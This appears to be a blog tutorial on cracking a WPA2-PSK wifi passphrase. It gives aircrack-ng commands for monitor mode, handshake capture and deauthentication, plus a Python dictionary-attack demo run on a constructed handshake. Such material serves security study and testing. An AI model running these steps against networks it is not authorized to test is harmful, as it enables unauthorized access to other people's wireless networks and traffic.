This post describes, step by step, how to recover the pre-shared key of a WPA2-PSK wifi access point with the aircrack-ng suite, which ships pre-installed in Kali Linux.
Install OS and Aircrack tool:
The first step is to have Kali Linux installed on your system (preferable, because aircrack-ng comes pre-installed) or any other Linux distribution with the aircrack-ng suite installed.
Check your Wireless Card’s injection capability:
It is better to have a wireless card whose chipset supports packet injection (I haven't tried with a normal card). Monitor mode alone is enough to passively capture a handshake; injection is what you need if you want to actively deauthenticate a client so that it reconnects. This "link" on aircrack-ng's website discusses card compatibility in detail.
Put your card in Monitor Mode:
Now put your card into monitor mode with the following command:
airmon-ng start wlan0
where wlan0 is the interface name of your wireless card. Running airmon-ng with no arguments lists the wireless interfaces it detects, together with their driver and chipset, so you can confirm the name before you start. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant and the like), run "airmon-ng check kill" first, otherwise the interface may be pulled out of monitor mode while you capture.
Check available wifi connections:
You can list all the access points and clients in range by typing the following command:
airodump-ng wlan0mon
where wlan0mon is the name of the monitor-mode interface that airmon-ng created in the previous step (older versions name it mon0). Note the BSSID, CH (channel) and ENC/AUTH columns of your target: this attack only applies to networks showing WPA2 with PSK authentication, and a station listed under that BSSID in the lower table means there is a client whose handshake you can capture.
Listen to your targeted connection:
Now you can listen to your targeted access point (which you found in the previous step) with the following command:
airodump-ng -c 9 --bssid 00:00:11:11:22:22 -w psk wlan0mon
-c sets the channel to listen on.
9 is the channel number (take it from the CH column of the previous step).
--bssid restricts the capture to the access point whose MAC address follows.
00:00:11:11:22:22 is the BSSID (MAC address) of the targeted access point.
-w writes the captured frames to files whose names start with the prefix that follows.
psk is that file prefix; airodump-ng appends a counter and extension, so the capture ends up in psk-01.cap.
wlan0mon is the monitor-mode interface.
After this the terminal shows the airodump-ng output for the specified access point only. Now you have to wait until the top line of that output shows:
WPA handshake: 00:00:11:11:22:22
This appears once airodump-ng has captured a complete 4-way handshake, which happens when a client connects (or reconnects) to the access point. If no client connects on its own, the standard approach in the aircrack-ng tutorial is to send a deauthentication frame to an already-associated client with aireplay-ng (its -0 option) so that it reconnects; that is the step that needs an injection-capable card.
Run aircrack-ng to crack the pre-shared key:
Once that message appears, the capture file contains the 4-way handshake: both MAC addresses, the two nonces and the EAPOL-Key frames with their message integrity codes (MICs). Note that this is not a hash of the pre-shared key itself. For each candidate passphrase, aircrack-ng derives the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, with the SSID as salt), derives the PTK from the PMK, the MACs and the nonces, and checks whether the MIC it computes with that PTK matches the captured one. Run the following command to try the words of a dictionary against the handshake:
aircrack-ng -w dictionaryFile -b 00:00:11:11:22:22 psk*.cap
-w specifies the dictionary (wordlist) file.
dictionaryFile is the name of the dictionary file, including its path.
-b selects the handshake to attack by the BSSID (MAC address) of the access point, in case the capture contains more than one network.
00:00:11:11:22:22 is the MAC address of your targeted access point.
psk*.cap is a shell glob that expands to every capture file whose name starts with "psk" and ends in .cap (for example psk-01.cap).
Now you will see aircrack-ng testing the words of the dictionary against the handshake. If the pre-shared key is in the dictionary (and the captured handshake is complete) you get it after some processing on your processor's part; because PBKDF2 with 4096 iterations is deliberately slow, expect on the order of a few thousand keys per second per CPU core, so a large dictionary takes a while, and a passphrase that is not in the dictionary will never be found this way.
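To make the last two steps concrete, here is an added example (my own code, not part of the original post and not aircrack-ng's implementation) that performs the same check aircrack-ng does for every dictionary word: PBKDF2 to the PMK, PRF-512 to the PTK, and an HMAC-SHA1 MIC over the EAPOL frame. The SSID "TestNet", the MAC addresses, the nonces and the EAPOL-Key message 2 skeleton are constructed for the demonstration, not taken from a real capture, and the "captured" MIC is computed from a known passphrase so that the dictionary loop has something to recover. The PMK test vector ("password" / "IEEE") is the one from the IEEE 802.11i standard.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# WPA2-PSK key hierarchy, as a cracker must recompute it per candidate:
#   PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
#   PTK = PRF-512(PMK, "Pairwise key expansion", min/max MAC || min/max nonce)
#   KCK = PTK[0:16];  MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[0:16]
# (key-descriptor version 2, i.e. WPA2/CCMP; WPA/TKIP uses HMAC-MD5 instead)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """The slow step: 4096 PBKDF2 rounds is what limits dictionary speed."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: four HMAC-SHA1 blocks over label||0x00||data||i."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(hs: dict, candidate: str) -> bool:
    """True if the candidate reproduces the MIC captured in the handshake."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"])


def crack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: first word that verifies, or None if none does."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_passphrase(hs, word):
            return word
    return None


# --- Constructed sample handshake (not a real capture) -----------------------
SAMPLE_SSID = "TestNet"                       # made-up SSID
AP_MAC = bytes.fromhex("000011112222")        # made-up BSSID
CLIENT_MAC = bytes.fromhex("aabbccddeeff")    # made-up station MAC
ANONCE = bytes(range(32))                     # fixed, not random, for repeatability
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 skeleton: EAPOL v1 / type Key / body length 95, descriptor
# type 2, key info 0x010a, key length 0, replay counter 1, SNonce, IV, RSC, ID,
# MIC field zeroed, key-data length 0.
EAPOL_MSG2 = (bytes.fromhex("0103005f") + b"\x02" + bytes.fromhex("010a")
              + b"\x00\x00" + (1).to_bytes(8, "big") + SNONCE
              + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")


def build_sample_handshake(passphrase: str) -> dict:
    """Fabricate the MIC an AP/client pair using this passphrase would produce."""
    pmk = pmk_from_passphrase(passphrase, SAMPLE_SSID)
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {"ssid": SAMPLE_SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2,
            "mic": eapol_mic(ptk[:16], EAPOL_MSG2)}


SAMPLE_HANDSHAKE = build_sample_handshake("password123")
SAMPLE_WORDLIST = ["letmein", "qwerty", "password123", "hunter2"]  # constructed

if __name__ == "__main__":
    print("PMK(password, IEEE) =", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", crack(SAMPLE_HANDSHAKE, SAMPLE_WORDLIST))
```

Each candidate costs 4096 HMAC-SHA1 rounds before the cheap PTK and MIC steps, which is why the attack is bounded by dictionary quality rather than by the capture: a passphrase absent from the wordlist is never recovered, and a different SSID changes the PMK even for the same passphrase, so precomputed tables are only useful per SSID.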
I will soon add links to the related guides for using the Linux tools and the Linux environment (e.g. getting a dictionary or finding already available ones). My main content was taken from aircrack-ng's website.
See you guys soon.